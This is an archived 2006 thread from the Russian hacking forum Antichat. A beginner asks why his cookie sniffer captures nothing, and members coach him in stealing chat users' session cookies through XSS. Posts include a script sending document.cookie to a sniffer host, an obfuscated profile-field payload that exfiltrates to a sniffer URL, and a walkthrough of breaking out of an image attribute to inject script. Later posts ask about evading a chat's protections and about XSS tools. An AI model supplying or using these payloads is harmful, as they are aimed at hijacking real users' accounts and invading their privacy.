Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Чаты (https://forum.antichat.xyz/forumdisplay.php?f=10)
-   -   Народ помогите (https://forum.antichat.xyz/showthread.php?t=16556)

x[M]akep 26.03.2006 15:42

Народ помогите
 
Народ помогите! Со снифером! почему когда я оставляю ссылку на снивер и ктонить на ней кликнет то в логе вот такая ЖОПА:


[Sun Mar 26 15:35:10 2006] IP=89.54.80.70 SITE=
REFERER=
QUERY=MT=1
AGENT=

[Sun Mar 26 15:33:56 2006] IP=207.46.98.148 SITE=
REFERER=
QUERY=
AGENT=msnbot/1.0 (+http://search.msn.com/msnbot.htm)

Никаких куков ГДЕ ОНИ куда пропали!?!?!?!? :confused: :confused: :confused:
ИЛИ я чет нитак делаю помогите плиз!

vorishka 26.03.2006 15:57

ты забыл document.cookie

ZINGER 26.03.2006 16:31

может даже у чела оутпост стоит и перекрывает рефер

x[M]akep 26.03.2006 18:44

Цитата:

Сообщение от vorishka
ты забыл document.cookie

Я просто новичек в этом деле :) Че это такое document.cookie??? :confused:

vectorg 26.03.2006 19:26

<script>img = new Image(); img.src = "http://путь_к_снифферу/s.jpg?"+document.cookie;</script>

x[M]akep 26.03.2006 20:53

Цитата:

Сообщение от VectorG
<script>img = new Image(); img.src = "http://путь_к_снифферу/s.jpg?"+document.cookie;</script>

Но насколько я знаю такой скрипт подходит не для всех ЧАТОВ! или я ОШИБАЮСЬ? Если он для всех то где его тогда нужно писать? :confused:

Utochka 26.03.2006 21:49

Если в чате есть XSS, то почему нет! Писать его надо там где пропускает html теги. А вообще то УЧИ МАТ ЧАСТЬ!

~Fenix~ 27.03.2006 00:20

К примеру можешь писать в поле ник или цвет

NeMiNeM 27.03.2006 01:36

Оставить ссылку на сниффер не достаточно.. Нужно сначало найти уязвимость, хсс в данному случае, а тогда уже внедрять ссылку на сниффер с кражой куков. А то, что они просто кликнут на линк, кроме айпи, тебе больше ничего не даст.

1ten0.0net1 27.03.2006 02:32

2 Автар А как же у тебя логи снифер пишет, если ты не знаешь куда вставлять скрипт???

x[M]akep 27.03.2006 17:21

Цитата:

Сообщение от NeX
Если в чате есть XSS, то почему нет! Писать его надо там где пропускает html теги. А вообще то УЧИ МАТ ЧАСТЬ!

А как научится определять XSS

x[M]akep 27.03.2006 17:26

Я качал я VIDEO.ANTICHAT.RU ролики и там вот напримере muz-tv_chat-xss чувак пишет:

В поле "О себе"
' style='background:url(javascript:document.images[1].src=/http:xxantichat.ruxcgi-binxs.jpg?/.sourse.replace(/x/g,String.fromCharcode(47))+opener.location)' s

ОТКУДА ОН ВАЩЕ ЭТО ВЗЯЛ? Откуда узнал что это сработает?

vectorg 27.03.2006 17:33

исходный код посмотри и всё поймёшь...

x[M]akep 27.03.2006 17:59

Цитата:

Сообщение от VectorG
исходный код посмотри и всё поймёшь...

Код чего :confused: сайта :confused:

vectorg 27.03.2006 18:03

Цитата:

Сообщение от x[M]akep
Код чего :confused: сайта :confused:

html код страницы куда впихнётся твой код с xss из поля "О себе" "

x[M]akep 27.03.2006 18:19

Цитата:

Сообщение от VectorG
html код страницы куда впихнётся твой код с xss из поля "О себе" "

ты конечно извини за мою надоедливость но вот еще тебе вопросик: Как понять можно ли туда его запихнуть или нельзя? Что для этого нужно знать?

p.s. SORRI народ вы не думайте что я ламер но просто мне хочется узнать чуть больше обо всем этом!!! И к томуже вы тоже у когото этому научились :) так помогите и мне :)

CinerX 27.03.2006 18:55

Хм... Почитай статьи на ачате про взлом чатов... Тебе станет немного понятней, что это =)

http://antichat.ru/crackchat/index.html
http://antichat.ru/txt/old/chat_faq.shtm
http://antichat.ru/crackchat/java.htmll

Nova 27.03.2006 19:00

Поищи в интернете в гугле www.google.com мануалы по XSS что да как и всё поймёш....

x[M]akep 27.03.2006 19:50

ПАСИБ! :) А что надо знать чтобы этим заниматся :confused:

vectorg 27.03.2006 19:56

http://antichat.ru/txt/old/chat_faq.shtml
http://antichat.ru/crackchat/java.html

это так к слову... :D


собственно вот в чём суть, если мы впишем в графе фото http://url_фотки/nax.jpg, то в окне "о себе" в html коде мы получим:

PHP код:

<img src="http://url_фотки/nax.jpg"

там в чате фильтровались некоторые символы, я точно не помню какие влом смотреть...

собственно если вписать в графе фото http://url_фотки/nax.jpg"><script>alert("nax")</script>, то на выходе получим:

PHP код:

<img src="http://url_фотки/nax.jpg"><script>alert("nax")</script>"> 

я думаю тут нечего объяснять... это сработает только если символы не фильтруются!!!

дальше работает знание и воображение :D

http://ha.ckers.org/xss.html - тут можешь посмотреть множество реализация javascript'ов, поможет в дальнейшем освоении xss

а чтобы понимать xss нужно знание html и javascript

x[M]akep 27.03.2006 20:29

Цитата:

Сообщение от VectorG
http://antichat.ru/txt/old/chat_faq.shtml
http://antichat.ru/crackchat/java.html

это так к слову... :D


собственно вот в чём суть, если мы впишем в графе фото http://url_фотки/nax.jpg, то в окне "о себе" в html коде мы получим:

PHP код:

<img src="http://url_фотки/nax.jpg"

там в чате фильтровались некоторые символы, я точно не помню какие влом смотреть...

собственно если вписать в графе фото http://url_фотки/nax.jpg"><script>alert("nax")</script>, то на выходе получим:

PHP код:

<img src="http://url_фотки/nax.jpg"><script>alert("nax")</script>"> 

я думаю тут нечего объяснять... это сработает только если символы не фильтруются!!!

дальше работает знание и воображение :D

http://ha.ckers.org/xss.html - тут можешь посмотреть множество реализация javascript'ов, поможет в дальнейшем освоении xss

а чтобы понимать xss нужно знание html и javascript

БОЛЬШОЕ ПИСИБО!!! У меня вопросик к тебе ышо один будет! :) ты знаешь какиенить ресерсы на которых можно подробно узнать о html и javascript?
А то в i-nete много таких а толку от них 0. Напиши если знаешь! Буду очень признателен:)

vectorg 27.03.2006 21:02

http://www.yandex.ru/yandsearch?rpt=...%ED%E8%EA+html
http://www.yandex.ru/yandsearch?text...ript&stype=www

x[M]akep 28.03.2006 19:18

ПАСИБ буду учить! Читать! :) :) :)

SanyaX 28.03.2006 19:24

Мдя а сам найти не мог книги???

x[M]akep 28.03.2006 21:32

НАРОД! У мну вопросик!
Вот допустим есть чат на котором можно воткнуть картинку но только загрузкой с компа!
Внимание вопрос:
Можноли использовать это для того чтобы запустить СНИФЕР :confused:

Tem 28.03.2006 21:40

Я тк думую эта фишка почти во всех чатах и сней не запустиш снифер.

x[M]akep 28.03.2006 21:51

а если допусим я получил куки! а в чите скрипт отключающий правую кнопку мыши, его можно какнить обойти :confused:

Tem 28.03.2006 22:10

А зачем тебе вообше правая конпка ?

x[M]akep 28.03.2006 22:26

Цитата:

Сообщение от Tem
А зачем тебе вообше правая конпка ?

ну чтобы воспользоватся IE_XSS_Kit

x[M]akep 29.03.2006 20:03

народ а какие еще можно использовать программы кроме IE_XSS_Kit :confused:


Время: 17:59